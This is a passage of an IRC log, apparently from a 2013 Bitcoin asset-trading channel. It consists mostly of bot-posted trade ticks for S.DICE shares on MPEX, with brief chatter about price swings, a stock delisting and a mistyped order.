0.00480607 = 3.7007 BTC [+] Jan 16 07:55:52 [MPEX] [S.DICE] 3332 @ 0.00480648 = 16.0152 BTC [+] Jan 16 07:55:54 [MPEX] [S.DICE] 2100 @ 0.00480769 = 10.0961 BTC [+] Jan 16 07:55:55 [MPEX] [S.DICE] 3500 @ 0.00480771 = 16.827 BTC [+] Jan 16 07:56:00 [MPEX] [S.DICE] 1068 @ 0.00480836 = 5.1353 BTC [+] Jan 16 07:56:02 [MPEX] [S.DICE] 2184 @ 0.00480844 = 10.5016 BTC [+] Jan 16 07:56:03 [MPEX] [S.DICE] 2203 @ 0.0048088 = 10.5938 BTC [+] Jan 16 07:56:04 [MPEX] [S.DICE] 550 @ 0.00480882 = 2.6449 BTC [+] Jan 16 07:56:08 [MPEX] [S.DICE] 2350 @ 0.00480946 = 11.3022 BTC [+] Jan 16 07:56:09 [MPEX] [S.DICE] 4350 @ 0.00480947 = 20.9212 BTC [+] Jan 16 07:56:10 [MPEX] [S.DICE] 600 @ 0.00481158 = 2.8869 BTC [+] Jan 16 07:56:15 [MPEX] [S.DICE] 2600 @ 0.00481168 = 12.5104 BTC [+] Jan 16 07:56:21 [MPEX] [S.DICE] 2000 @ 0.00481194 = 9.6239 BTC [+] Jan 16 07:56:26 [MPEX] [S.DICE] 2500 @ 0.00481305 = 12.0326 BTC [+] Jan 16 07:56:28 [MPEX] [S.DICE] 1400 @ 0.00481453 = 6.7403 BTC [+] Jan 16 07:56:29 [MPEX] [S.DICE] 350 @ 0.0048158 = 1.6855 BTC [+] Jan 16 07:56:31 [MPEX] [S.DICE] 650 @ 0.00481605 = 3.1304 BTC [+] Jan 16 07:56:32 [MPEX] [S.DICE] 3819 @ 0.00481704 = 18.3963 BTC [+] Jan 16 07:56:35 [MPEX] [S.DICE] 1606 @ 0.0048176 = 7.7371 BTC [+] Jan 16 07:56:38 da fuck Jan 16 07:56:40 [MPEX] [S.DICE] 500 @ 0.00481882 = 2.4094 BTC [+] Jan 16 07:56:42 [MPEX] [S.DICE] 5550 @ 0.00481908 = 26.7459 BTC [+] Jan 16 07:56:43 [MPEX] [S.DICE] 3143 @ 0.0048201 = 15.1496 BTC [+] Jan 16 07:56:45 sdice can do this too ?! Jan 16 07:56:45 [MPEX] [S.DICE] 2750 @ 0.00482146 = 13.259 BTC [+] Jan 16 07:56:46 [MPEX] [S.DICE] 3600 @ 0.00482248 = 17.3609 BTC [+] Jan 16 07:56:47 [MPEX] [S.DICE] 2656 @ 0.00482339 = 12.8109 BTC [+] Jan 16 07:56:48 [MPEX] [S.DICE] 2676 @ 0.00482662 = 12.916 BTC [+] Jan 16 07:56:49 [MPEX] [S.DICE] 4996 @ 0.00483162 = 24.1388 BTC [+] Jan 16 07:56:50 [MPEX] [S.DICE] 1550 @ 0.00483188 = 7.4894 BTC [+] Jan 16 07:56:53 [MPEX] [S.DICE] 4600 @ 0.00483298 = 22.2317 BTC [+] Jan 16 07:56:55 [MPEX] [S.DICE] 2900 @ 0.00483332 = 14.0166 BTC [+] Jan 16 07:56:55 [MPEX] [S.DICE] 2400 @ 0.00483545 = 11.6051 BTC [+] Jan 16 07:56:57 [MPEX] [S.DICE] 603 @ 0.00483635 = 2.9163 BTC [+] Jan 16 07:58:49 [MPEX] [S.DICE] 5000 @ 0.00483632 = 24.1816 BTC [-] Jan 16 07:58:51 [MPEX] [S.DICE] 432 @ 0.00483634 = 2.0893 BTC [+] Jan 16 07:58:56 [MPEX] [S.DICE] 1097 @ 0.00483635 = 5.3055 BTC [+] Jan 16 07:59:02 [MPEX] [S.DICE] 1606 @ 0.00483735 = 7.7688 BTC [+] Jan 16 07:59:04 [MPEX] [S.DICE] 572 @ 0.00483826 = 2.7675 BTC [+] Jan 16 07:59:14 [MPEX] [S.DICE] 4900 @ 0.00483927 = 23.7124 BTC [+] Jan 16 07:59:15 [MPEX] [S.DICE] 200 @ 0.00483967 = 0.9679 BTC [+] Jan 16 07:59:20 [MPEX] [S.DICE] 2300 @ 0.0048409 = 11.1341 BTC [+] Jan 16 07:59:21 [MPEX] [S.DICE] 2900 @ 0.00484094 = 14.0387 BTC [+] Jan 16 07:59:22 [MPEX] [S.DICE] 993 @ 0.00484477 = 4.8109 BTC [+] Jan 16 07:59:56 lol cool Jan 16 08:00:23 apparently Jan 16 08:01:21 !ticker m s.dice Jan 16 08:01:22 [MPEX:S.DICE] 1D: 0.0045637 / 0.00474129 / 0.00484477 (1020519 shares, 4,838.58 BTC), 7D: 0.00449034 / 0.00469048 / 0.00484477 (2519971 shares, 11,819.89 BTC), 30D: 0.0014 / 0.00367557 / 0.00484477 (12302512 shares, 45,218.75 BTC) Jan 16 08:01:32 so like 3k btc Jan 16 08:01:45 ;;calc 0.00484477 / 0.0047077 Jan 16 08:01:45 1.0291161289 Jan 16 08:01:49 3% Jan 16 08:03:00 I purchased for like 3% of that Jan 16 08:04:37 it never sold that low did it ?! Jan 16 08:04:58 [MPEX] [S.DICE] 869 @ 0.00482809 = 4.1956 BTC [-] Jan 16 08:05:01 i mean i recall 18s flashing at some point, bu that'd be 35% Jan 16 08:05:04 [MPEX] [S.DICE] 431 @ 0.00484468 = 2.0881 BTC [+] Jan 16 08:19:24 I mean I bought 3% of what what just sold (100/3000) Jan 16 08:21:13 o o Jan 16 08:21:26 wow Jan 16 08:21:30 oh Jan 16 08:22:03 i sold 3% Jan 16 08:27:10 [MPEX] [S.MPOE] 1000 @ 0.00065472 = 0.6547 BTC [+] Jan 16 08:27:14 [MPEX] [S.MPOE] 17550 @ 0.00065473 = 11.4905 BTC [+] Jan 16 08:27:20 [MPEX] [S.MPOE] 18294 @ 0.00065928 = 12.0609 BTC [+] Jan 16 08:27:21 [MPEX] [S.MPOE] 22256 @ 0.00066 = 14.689 BTC [+] Jan 16 08:31:52 [MPEX] [S.DICE] 1200 @ 0.00468878 = 5.6265 BTC [-] Jan 16 08:33:52 [MPEX] [S.DICE] 1000 @ 0.00467321 = 4.6732 BTC [-] Jan 16 08:33:54 [MPEX] [S.DICE] 432 @ 0.0046732 = 2.0188 BTC [-] Jan 16 08:33:55 [MPEX] [S.DICE] 1074 @ 0.00467318 = 5.019 BTC [-] Jan 16 08:47:13 [MPEX] [S.DICE] 432 @ 0.00467319 = 2.0188 BTC [+] Jan 16 08:47:15 [MPEX] [S.DICE] 2318 @ 0.00467318 = 10.8324 BTC [-] Jan 16 08:52:00 [MPEX] [S.DICE] 2115 @ 0.00467318 = 9.8838 BTC [-] Jan 16 09:01:43 [MPEX] [S.DICE] 493 @ 0.00467318 = 2.3039 BTC [-] Jan 16 09:01:45 [MPEX] [S.DICE] 1400 @ 0.00467314 = 6.5424 BTC [-] Jan 16 09:01:51 [MPEX] [S.DICE] 500 @ 0.00466677 = 2.3334 BTC [-] Jan 16 09:01:52 [MPEX] [S.DICE] 1464 @ 0.00464758 = 6.8041 BTC [-] Jan 16 09:01:54 [MPEX] [S.DICE] 1843 @ 0.00463134 = 8.5356 BTC [-] Jan 16 09:28:33 [MPEX] [S.DICE] 635 @ 0.00468499 = 2.975 BTC [+] Jan 16 09:28:35 [MPEX] [S.DICE] 432 @ 0.00468874 = 2.0255 BTC [+] Jan 16 09:28:45 [MPEX] [S.DICE] 1783 @ 0.00468878 = 8.3601 BTC [+] Jan 16 09:40:49 [MPEX] [S.MPOE] 4333 @ 0.00066 = 2.8598 BTC [+] Jan 16 09:40:51 [MPEX] [S.MPOE] 8517 @ 0.00066182 = 5.6367 BTC [+] Jan 16 09:54:32 [MPEX] [S.DICE] 432 @ 0.00463139 = 2.0008 BTC [-] Jan 16 09:54:43 [MPEX] [S.DICE] 1518 @ 0.00463134 = 7.0304 BTC [-] Jan 16 10:01:06 [BTCTC] [BASIC-MINING] 3 @ 0.3 = 0.9 BTC [-] Jan 16 10:19:13 [MPEX] [S.DICE] 432 @ 0.00466308 = 2.0145 BTC [+] Jan 16 10:19:14 [MPEX] [S.DICE] 842 @ 0.0046631 = 3.9263 BTC [+] Jan 16 10:23:57 [MPEX] [S.DICE] 1231 @ 0.0046631 = 5.7403 BTC [+] Jan 16 10:23:59 [MPEX] [S.DICE] 669 @ 0.00468878 = 3.1368 BTC [+] Jan 16 10:31:22 [MPEX] [S.DICE] 432 @ 0.00468877 = 2.0255 BTC [-] Jan 16 10:31:24 [MPEX] [S.DICE] 598 @ 0.00468878 = 2.8039 BTC [+] Jan 16 10:31:25 [MPEX] [S.DICE] 300 @ 0.00469826 = 1.4095 BTC [+] Jan 16 10:31:26 [MPEX] [S.DICE] 840 @ 0.00470414 = 3.9515 BTC [+] Jan 16 10:34:59 [MPEX] [S.DICE] 250 @ 0.00468876 = 1.1722 BTC [-] Jan 16 10:35:01 [MPEX] [S.DICE] 10 @ 0.00470414 = 0.047 BTC [+] Jan 16 10:35:02 [MPEX] [S.DICE] 1140 @ 0.00471199 = 5.3717 BTC [+] Jan 16 10:35:32 [MPEX] [S.DICE] 250 @ 0.00465778 = 1.1644 BTC [-] Jan 16 10:35:34 [MPEX] [S.DICE] 432 @ 0.00465777 = 2.0122 BTC [-] Jan 16 10:35:35 [MPEX] [S.DICE] 2468 @ 0.00465776 = 11.4954 BTC [-] Jan 16 10:39:13 [MPEX] [S.DICE] 432 @ 0.00471196 = 2.0356 BTC [+] Jan 16 10:39:15 [MPEX] [S.DICE] 1093 @ 0.00471199 = 5.1502 BTC [+] Jan 16 10:39:16 [MPEX] [S.DICE] 60 @ 0.00475 = 0.285 BTC [+] Jan 16 10:48:03 [MPEX] [S.DICE] 2800 @ 0.00477384 = 13.3668 BTC [+] Jan 16 10:51:09 [MPEX] [S.DICE] 1300 @ 0.00476791 = 6.1983 BTC [-] Jan 16 11:00:43 [MPEX] [S.DICE] 2750 @ 0.00477384 = 13.1281 BTC [+] Jan 16 11:05:34 [MPEX] [S.DICE] 2155 @ 0.00477384 = 10.2876 BTC [+] Jan 16 11:05:35 [MPEX] [S.DICE] 1379 @ 0.00478897 = 6.604 BTC [+] Jan 16 11:05:36 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jan 16 11:13:22 [MPEX] [S.DICE] 366 @ 0.00478897 = 1.7528 BTC [+] Jan 16 11:17:19 [MPEX] [S.DICE] 1900 @ 0.00478897 = 9.099 BTC [+] Jan 16 11:20:24 [MPEX] [S.DICE] 50 @ 0.00476791 = 0.2384 BTC [-] Jan 16 11:20:26 [MPEX] [S.DICE] 550 @ 0.00476541 = 2.621 BTC [-] Jan 16 11:37:05 [MPEX] [S.DICE] 505 @ 0.00478897 = 2.4184 BTC [+] Jan 16 11:37:07 [MPEX] [S.DICE] 695 @ 0.00479038 = 3.3293 BTC [+] Jan 16 11:40:19 [MPEX] [S.DICE] 1455 @ 0.00479038 = 6.97 BTC [+] Jan 16 11:40:21 [MPEX] [S.DICE] 3400 @ 0.00481849 = 16.3829 BTC [+] Jan 16 11:40:22 [MPEX] [S.DICE] 2545 @ 0.00483033 = 12.2932 BTC [+] Jan 16 11:51:51 [MPEX] [S.DICE] 1400 @ 0.00478117 = 6.6936 BTC [-] Jan 16 11:51:54 [MPEX] [S.DICE] 165 @ 0.00476541 = 0.7863 BTC [-] Jan 16 11:51:58 [MPEX] [S.DICE] 495 @ 0.00467781 = 2.3155 BTC [-] Jan 16 11:56:19 [MPEX] [S.DICE] 432 @ 0.00467785 = 2.0208 BTC [+] Jan 16 11:56:22 [MPEX] [S.DICE] 779 @ 0.00467781 = 3.644 BTC [-] Jan 16 11:56:24 [MPEX] [S.DICE] 39 @ 0.00465776 = 0.1817 BTC [-] Jan 16 11:59:42 [MPEX] [S.DICE] 432 @ 0.00465777 = 2.0122 BTC [+] Jan 16 11:59:48 [MPEX] [S.DICE] 426 @ 0.00465776 = 1.9842 BTC [-] Jan 16 12:10:14 [BTCTC] [ESECURITYSABTC] 1 @ 0.849 BTC [+] Jan 16 12:26:11 [MPEX] [S.DICE] 432 @ 0.00468166 = 2.0225 BTC [+] Jan 16 12:26:17 [MPEX] [S.DICE] 2767 @ 0.00468168 = 12.9542 BTC [+] Jan 16 12:26:20 [MPEX] [S.DICE] 2218 @ 0.00468607 = 10.3937 BTC [+] Jan 16 12:27:25 [BTCTC] [RSM] 4 @ 0.0073 = 0.0292 BTC [+] Jan 16 12:36:23 [MPEX] [S.DICE] 1300 @ 0.00480297 = 6.2439 BTC [+] Jan 16 12:55:55 [MPEX] [S.DICE] 471 @ 0.00470726 = 2.2171 BTC [-] Jan 16 12:55:57 [MPEX] [S.DICE] 1110 @ 0.00465777 = 5.1701 BTC [-] Jan 16 12:56:02 [MPEX] [S.DICE] 719 @ 0.00465776 = 3.3489 BTC [-] Jan 16 13:00:30 [MPEX] [S.DICE] 400 @ 0.00474762 = 1.899 BTC [+] Jan 16 13:00:31 [MPEX] [S.DICE] 432 @ 0.00478485 = 2.0671 BTC [+] Jan 16 13:00:33 [MPEX] [S.DICE] 1918 @ 0.00478489 = 9.1774 BTC [+] Jan 16 13:01:47 [MPEX] [S.DICE] 1000 @ 0.00474761 = 4.7476 BTC [-] Jan 16 13:01:48 [MPEX] [S.DICE] 536 @ 0.00478489 = 2.5647 BTC [+] Jan 16 13:07:14 looks like mpex lost another stock and this time it's S.BVPS Jan 16 13:12:36 EskimoBob: http://trilema.com/2013/sbvps-delisting-notice/ Jan 16 13:14:25 [MPEX] [S.DICE] 500 @ 0.00479479 = 2.3974 BTC [+] Jan 16 13:15:18 lol @ "mpex is like a fart in a small room" Jan 16 13:17:13 [MPEX] [S.DICE] 1850 @ 0.00479479 = 8.8704 BTC [+] Jan 16 13:18:17 [BTCTC] [BASIC-MINING] 3 @ 0.32 = 0.96 BTC [+] Jan 16 13:18:19 [BTCTC] [BASIC-MINING] 7 @ 0.33 = 2.31 BTC [+] Jan 16 13:18:22 I this one going to be just deleted or will there be some type of buyback by BVPS new owners? Jan 16 13:20:23 ;;seen Namworld Jan 16 13:20:23 Namworld was last seen in #bitcoin-assets 5 hours and 58 seconds ago: I mean I bought 3% of what what just sold (100/3000) Jan 16 13:20:24 [MPEX] [S.DICE] 1000 @ 0.00483029 = 4.8303 BTC [+] Jan 16 13:20:25 [MPEX] [S.DICE] 1110 @ 0.0048303 = 5.3616 BTC [+] Jan 16 13:20:31 [MPEX] [S.DICE] 1690 @ 0.00483033 = 8.1633 BTC [+] Jan 16 13:21:03 namworld said something like, "well i would have liked to have stayed [on mpex]" Jan 16 13:21:15 so basically, delisted & deleted, yeah Jan 16 13:21:19 as it stands now Jan 16 13:24:01 how can mpex help that? Jan 16 13:29:43 [BTCTC] [GSDPT] 100 @ 0.0047 = 0.47 BTC [+] Jan 16 13:30:55 [MPEX] [S.DICE] 1392 @ 0.00483033 = 6.7238 BTC [+] Jan 16 13:31:02 [MPEX] [S.DICE] 808 @ 0.00483414 = 3.906 BTC [+] Jan 16 13:31:18 [BTCTC] [ESECURITYSABTC] 1 @ 0.85 BTC [+] Jan 16 13:32:50 [MPEX] [S.DICE] 414 @ 0.00479479 = 1.985 BTC [-] Jan 16 13:33:50 [BTCTC] [LTC-MINING] 1 @ 0.4489 BTC [+] Jan 16 13:37:29 [MPEX] [S.DICE] 1015 @ 0.00473864 = 4.8097 BTC [-] Jan 16 13:38:43 [BTCTC] [SYNERGY] 1 @ 0.17 BTC [+] Jan 16 13:44:16 [MPEX] [S.DICE] 1000 @ 0.00473864 = 4.7386 BTC [-] Jan 16 13:52:54 well, i don't think that's likely any time soon ;) Jan 16 14:03:37 [MPEX] [S.DICE] 432 @ 0.00466092 = 2.0135 BTC [-] Jan 16 14:03:39 [MPEX] [S.DICE] 1140 @ 0.00466088 = 5.3134 BTC [-] Jan 16 14:03:44 [MPEX] [S.DICE] 2028 @ 0.00466087 = 9.4522 BTC [-] Jan 16 14:12:02 [MPEX] [S.DICE] 432 @ 0.00466088 = 2.0135 BTC [+] Jan 16 14:12:08 [MPEX] [S.DICE] 1468 @ 0.00466087 = 6.8422 BTC [-] Jan 16 14:17:03 [MPEX] [S.DICE] 3850 @ 0.00466087 = 17.9443 BTC [-] Jan 16 14:23:26 ? Jan 16 14:33:51 [MPEX] [S.DICE] 432 @ 0.00466269 = 2.0143 BTC [+] Jan 16 14:33:53 [MPEX] [S.DICE] 472 @ 0.0046627 = 2.2008 BTC [+] Jan 16 14:33:54 [MPEX] [S.DICE] 1700 @ 0.00471288 = 8.0119 BTC [+] Jan 16 14:34:00 [MPEX] [S.DICE] 321 @ 0.00473864 = 1.5211 BTC [+] Jan 16 14:34:02 [MPEX] [S.DICE] 432 @ 0.00477105 = 2.0611 BTC [+] Jan 16 14:49:15 [MPEX] [S.DICE] 1950 @ 0.00480079 = 9.3615 BTC [+] Jan 16 14:49:17 [MPEX] [S.DICE] 800 @ 0.00477105 = 3.8168 BTC [-] Jan 16 14:53:42 [MPEX] [S.DICE] 1050 @ 0.00480163 = 5.0417 BTC [+] Jan 16 14:56:58 [MPEX] [S.MPOE] 10700 @ 0.00065135 = 6.9694 BTC [-] Jan 16 15:09:08 [MPEX] [S.DICE] 250 @ 0.00480163 = 1.2004 BTC [+] Jan 16 15:09:10 [MPEX] [S.DICE] 1140 @ 0.00483413 = 5.5109 BTC [+] Jan 16 15:09:15 [MPEX] [S.DICE] 1460 @ 0.00483414 = 7.0578 BTC [+] Jan 16 15:09:41 [MPEX] [S.DICE] 182 @ 0.00483414 = 0.8798 BTC [+] Jan 16 15:09:52 [MPEX] [S.DICE] 1786 @ 0.00483969 = 8.6437 BTC [+] Jan 16 15:09:57 [MPEX] [S.DICE] 1000 @ 0.00484467 = 4.8447 BTC [+] Jan 16 15:09:59 [MPEX] [S.DICE] 6000 @ 0.00484471 = 29.0683 BTC [+] Jan 16 15:10:06 [MPEX] [S.DICE] 1407 @ 0.00484477 = 6.8166 BTC [+] Jan 16 15:10:17 [MPEX] [S.DICE] 6500 @ 0.0048463 = 31.501 BTC [+] Jan 16 15:10:19 [MPEX] [S.DICE] 1594 @ 0.00484657 = 7.7254 BTC [+] Jan 16 15:10:20 [MPEX] [S.DICE] 450 @ 0.00484813 = 2.1817 BTC [+] Jan 16 15:10:22 [MPEX] [S.DICE] 3000 @ 0.00484969 = 14.5491 BTC [+] Jan 16 15:10:23 [MPEX] [S.DICE] 1042 @ 0.00485024 = 5.054 BTC [+] Jan 16 15:10:24 [MPEX] [S.DICE] 2000 @ 0.00485041 = 9.7008 BTC [+] Jan 16 15:10:39 [MPEX] [S.DICE] 1300 @ 0.00485166 = 6.3072 BTC [+] Jan 16 15:10:50 [MPEX] [S.DICE] 1350 @ 0.0048524 = 6.5507 BTC [+] Jan 16 15:11:06 [MPEX] [S.DICE] 2639 @ 0.00485503 = 12.8124 BTC [+] Jan 16 15:11:06 [MPEX] [S.DICE] 1800 @ 0.00485543 = 8.7398 BTC [+] Jan 16 15:11:08 [MPEX] [S.DICE] 600 @ 0.00485809 = 2.9149 BTC [+] Jan 16 15:11:09 [MPEX] [S.DICE] 2150 @ 0.00485842 = 10.4456 BTC [+] Jan 16 15:11:10 [MPEX] [S.DICE] 1950 @ 0.00485909 = 9.4752 BTC [+] Jan 16 15:11:12 [MPEX] [S.DICE] 1999 @ 0.00486072 = 9.7166 BTC [+] Jan 16 15:11:13 [MPEX] [S.DICE] 1100 @ 0.00486132 = 5.3475 BTC [+] Jan 16 15:11:14 [MPEX] [S.DICE] 1762 @ 0.00486381 = 8.57 BTC [+] Jan 16 15:11:23 [MPEX] [S.DICE] 900 @ 0.00486496 = 4.3785 BTC [+] Jan 16 15:11:25 [MPEX] [S.DICE] 2050 @ 0.00486548 = 9.9742 BTC [+] Jan 16 15:11:29 [MPEX] [S.DICE] 1400 @ 0.00486597 = 6.8124 BTC [+] Jan 16 15:11:31 [MPEX] [S.DICE] 3800 @ 0.00486909 = 18.5025 BTC [+] Jan 16 15:11:33 [MPEX] [S.DICE] 281 @ 0.00487219 = 1.3691 BTC [+] Jan 16 15:11:38 [MPEX] [S.DICE] 300 @ 0.00487709 = 1.4631 BTC [+] Jan 16 15:11:40 [MPEX] [S.DICE] 1000 @ 0.00487737 = 4.8774 BTC [+] Jan 16 15:11:41 [MPEX] [S.DICE] 1700 @ 0.00487916 = 8.2946 BTC [+] Jan 16 15:11:46 [MPEX] [S.DICE] 4500 @ 0.00488299 = 21.9735 BTC [+] Jan 16 15:11:48 [MPEX] [S.DICE] 1600 @ 0.00488501 = 7.816 BTC [+] Jan 16 15:11:50 [MPEX] [S.DICE] 2150 @ 0.00488596 = 10.5048 BTC [+] Jan 16 15:11:51 [MPEX] [S.DICE] 831 @ 0.00488796 = 4.0619 BTC [+] Jan 16 15:11:51 [MPEX] [S.DICE] 1700 @ 0.00489217 = 8.3167 BTC [+] Jan 16 15:11:53 [MPEX] [S.DICE] 1678 @ 0.00489501 = 8.2138 BTC [+] Jan 16 15:11:57 [MPEX] [S.DICE] 200 @ 0.00490112 = 0.9802 BTC [+] Jan 16 15:12:03 [MPEX] [S.DICE] 1392 @ 0.00490169 = 6.8232 BTC [+] Jan 16 15:12:04 [MPEX] [S.DICE] 1850 @ 0.00490463 = 9.0736 BTC [+] Jan 16 15:12:06 [MPEX] [S.DICE] 1477 @ 0.00490471 = 7.2443 BTC [+] Jan 16 15:12:07 [MPEX] [S.DICE] 6400 @ 0.00491218 = 31.438 BTC [+] Jan 16 15:12:08 [MPEX] [S.DICE] 1717 @ 0.00491791 = 8.4441 BTC [+] Jan 16 15:12:10 [MPEX] [S.DICE] 850 @ 0.00492349 = 4.185 BTC [+] Jan 16 15:12:11 [MPEX] [S.DICE] 1800 @ 0.00496217 = 8.9319 BTC [+] Jan 16 15:12:12 [MPEX] [S.DICE] 2899 @ 0.00496697 = 14.3992 BTC [+] Jan 16 15:15:28 Gotta love those crazy speculative maneuvers Jan 16 15:21:03 !ticker m s.dice Jan 16 15:21:05 [MPEX:S.DICE] 1D: 0.00459179 / 0.00476033 / 0.00496697 (999144 shares, 4,756.26 BTC), 7D: 0.00449034 / 0.00469691 / 0.00496697 (2656795 shares, 12,478.73 BTC), 30D: 0.0014 / 0.00369229 / 0.00496697 (12482087 shares, 46,087.58 BTC) Jan 16 15:23:15 So people buy up everything below a certain price and sell for an inflated price since nobody can't undercut them? This is better than video games Jan 16 15:23:25 [MPEX] [S.DICE] 1600 @ 0.00498009 = 7.9681 BTC [+] Jan 16 15:23:25 [MPEX] [S.DICE] 1049 @ 0.00511655 = 5.3673 BTC [+] Jan 16 15:23:27 [MPEX] [S.DICE] 1200 @ 0.00517869 = 6.2144 BTC [+] Jan 16 15:25:13 [MPEX] [S.DICE] 151 @ 0.0052 = 0.7852 BTC [+] Jan 16 15:25:19 [MPEX] [S.DICE] 1405 @ 0.00477105 = 6.7033 BTC [-] Jan 16 15:25:21 [MPEX] [S.DICE] 1170 @ 0.00466088 = 5.4532 BTC [-] Jan 16 15:25:22 [MPEX] [S.DICE] 654 @ 0.00466087 = 3.0482 BTC [-] Jan 16 15:25:27 [MPEX] [S.DICE] 1000 @ 0.00465781 = 4.6578 BTC [-] Jan 16 15:25:34 [MPEX] [S.DICE] 2348 @ 0.00465776 = 10.9364 BTC [-] Jan 16 15:25:36 [MPEX] [S.DICE] 800 @ 0.00465771 = 3.7262 BTC [-] Jan 16 15:25:37 [MPEX] [S.DICE] 3398 @ 0.00465496 = 15.8176 BTC [-] Jan 16 15:25:42 [MPEX] [S.DICE] 1354 @ 0.00464553 = 6.29 BTC [-] Jan 16 15:25:43 [MPEX] [S.DICE] 3800 @ 0.00464286 = 17.6429 BTC [-] Jan 16 15:25:44 [MPEX] [S.DICE] 1197 @ 0.00463134 = 5.5437 BTC [-] Jan 16 15:25:46 [MPEX] [S.DICE] 1544 @ 0.0046212 = 7.1351 BTC [-] Jan 16 15:25:47 [MPEX] [S.DICE] 800 @ 0.00462007 = 3.6961 BTC [-] Jan 16 15:25:52 [MPEX] [S.DICE] 60 @ 0.00462007 = 0.2772 BTC [-] Jan 16 15:26:00 then people sell for a deflated price Jan 16 15:26:03 [MPEX] [S.DICE] 2400 @ 0.00460781 = 11.0587 BTC [-] Jan 16 15:26:04 weird Jan 16 15:26:14 [MPEX] [S.DICE] 1211 @ 0.00460739 = 5.5795 BTC [-] Jan 16 15:26:30 [MPEX] [S.DICE] 6300 @ 0.0046006 = 28.9838 BTC [-] Jan 16 15:26:32 [MPEX] [S.DICE] 1006 @ 0.00459645 = 4.624 BTC [-] Jan 16 15:26:37 [MPEX] [S.DICE] 10 @ 0.00459179 = 0.0459 BTC [-] Jan 16 15:26:39 [MPEX] [S.DICE] 4441 @ 0.00459038 = 20.3859 BTC [-] Jan 16 15:26:44 [MPEX] [S.DICE] 8650 @ 0.00458829 = 39.6887 BTC [-] Jan 16 15:26:46 [MPEX] [S.DICE] 918 @ 0.00458368 = 4.2078 BTC [-] Jan 16 15:26:47 [MPEX] [S.DICE] 2850 @ 0.00458256 = 13.0603 BTC [-] Jan 16 15:26:52 [MPEX] [S.DICE] 1200 @ 0.00458093 = 5.4971 BTC [-] Jan 16 15:26:54 [MPEX] [S.DICE] 4527 @ 0.00457702 = 20.7202 BTC [-] Jan 16 15:27:00 [MPEX] [S.DICE] 3000 @ 0.00457629 = 13.7289 BTC [-] Jan 16 15:27:02 [MPEX] [S.DICE] 500 @ 0.00457596 = 2.288 BTC [-] Jan 16 15:27:03 [MPEX] [S.DICE] 3000 @ 0.00457533 = 13.726 BTC [-] Jan 16 15:27:05 [MPEX] [S.DICE] 2600 @ 0.00457532 = 11.8958 BTC [-] Jan 16 15:27:14 [MPEX] [S.DICE] 1900 @ 0.00457478 = 8.6921 BTC [-] Jan 16 15:27:16 [MPEX] [S.DICE] 2207 @ 0.00457186 = 10.0901 BTC [-] Jan 16 15:27:27 [MPEX] [S.DICE] 1600 @ 0.00456414 = 7.3026 BTC [-] Jan 16 15:27:29 [MPEX] [S.DICE] 2125 @ 0.0045637 = 9.6979 BTC [-] Jan 16 15:27:30 [MPEX] [S.DICE] 1850 @ 0.00456194 = 8.4396 BTC [-] Jan 16 15:27:32 [MPEX] [S.DICE] 1400 @ 0.00455617 = 6.3786 BTC [-] Jan 16 15:27:33 [MPEX] [S.DICE] 1200 @ 0.00455456 = 5.4655 BTC [-] Jan 16 15:27:34 [MPEX] [S.DICE] 3300 @ 0.00455309 = 15.0252 BTC [-] Jan 16 15:27:37 [MPEX] [S.DICE] 2500 @ 0.00455263 = 11.3816 BTC [-] Jan 16 15:27:41 [MPEX] [S.DICE] 500 @ 0.00455239 = 2.2762 BTC [-] Jan 16 15:27:42 [MPEX] [S.DICE] 4266 @ 0.00455073 = 19.4134 BTC [-] Jan 16 15:27:48 [MPEX] [S.DICE] 8800 @ 0.00455006 = 40.0405 BTC [-] Jan 16 15:27:54 [MPEX] [S.DICE] 4750 @ 0.00454746 = 21.6004 BTC [-] Jan 16 15:27:56 [MPEX] [S.DICE] 1308 @ 0.00454703 = 5.9475 BTC [-] Jan 16 15:28:57 in other news... Jan 16 15:28:59 ;;ticker Jan 16 15:29:00 BTCUSD ticker | Best bid: 14.48503, Best ask: 14.50000, Bid-ask spread: 0.01497, Last trade: 14.48503, 24 hour volume: 35761.68913453, 24 hour low: 14.15850, 24 hour high: 14.50000, 24 hour vwap: 14.33216 Jan 16 16:00:58 [MPEX] [S.DICE] 3340 @ 0.00479994 = 16.0318 BTC [+] Jan 16 16:00:59 [MPEX] [S.DICE] 60 @ 0.00473687 = 0.2842 BTC [-] Jan 16 16:04:58 [MPEX] [S.DICE] 432 @ 0.00473688 = 2.0463 BTC [+] Jan 16 16:05:05 [MPEX] [S.DICE] 1006 @ 0.00473687 = 4.7653 BTC [-] Jan 16 16:31:54 Who runs BitVPS now? Jan 16 16:35:23 [MPEX] [S.DICE] 500 @ 0.00480643 = 2.4032 BTC [+] Jan 16 16:42:38 !ticker h sdice Jan 16 16:42:40 [HAVELOCK:SDICE] 1D: 0.48000000 / 0.48 / 0.48000000 (251 shares, 120.48000000 BTC), 7D: 0.47500000 / 0.4819037 / 0.50000000 (945 shares, 455.39900000 BTC), 30D: 0.37000000 / 0.45293345 / 0.62000000 (3516 shares, 1592.51399998 BTC) Jan 16 16:42:42 !ticker m sdice Jan 16 16:42:44 Did you kill the white man who killed you? Jan 16 16:42:51 !ticker mpex sdice Jan 16 16:42:52 I prepared your canoe with cedar boughs. Jan 16 16:42:57 !ticker mpex s.dice Jan 16 16:42:58 [MPEX:S.DICE] 1D: 0.00454703 / 0.00474688 / 0.0052 (1089738 shares, 5,172.86 BTC), 7D: 0.00449034 / 0.00469333 / 0.0052 (2750047 shares, 12,906.88 BTC), 30D: 0.0014 / 0.00370038 / 0.0052 (12586674 shares, 46,575.50 BTC) Jan 16 16:43:32 [MPEX] [S.DICE] 1050 @ 0.00480643 = 5.0468 BTC [+] Jan 16 16:43:38 [MPEX] [S.DICE] 850 @ 0.00473687 = 4.0263 BTC [-] Jan 16 16:45:42 thestringpuller, namworld+arij+phungus Jan 16 16:45:56 oh wow the 0.0048 wall dissappeared Jan 16 16:48:40 yeah its amazing what happens when you forget a zero Jan 16 16:48:44 :( Jan 16 16:49:25 lol Jan 16 16:49:33 [MPEX] [S.DICE] 432 @ 0.00484313 = 2.0922 BTC [+] Jan 16 16:49:35 [MPEX] [S.DICE] 1170 @ 0.00484315 = 5.6665 BTC [+] Jan 16 16:49:36 [MPEX] [S.DICE] 2250 @ 0.00484316 = 10.8971 BTC [+] Jan 16 16:49:37 [MPEX] [S.DICE] 1400 @ 0.00500243 = 7.0034 BTC [+] Jan 16 16:49:38 not funny dude Jan 16 16:49:39 [MPEX] [S.DICE] 4000 @ 0.00511056 = 20.4422 BTC [+] Jan 16 16:49:40 [MPEX] [S.DICE] 695 @ 0.00511057 = 3.5518 BTC [+] Jan 16 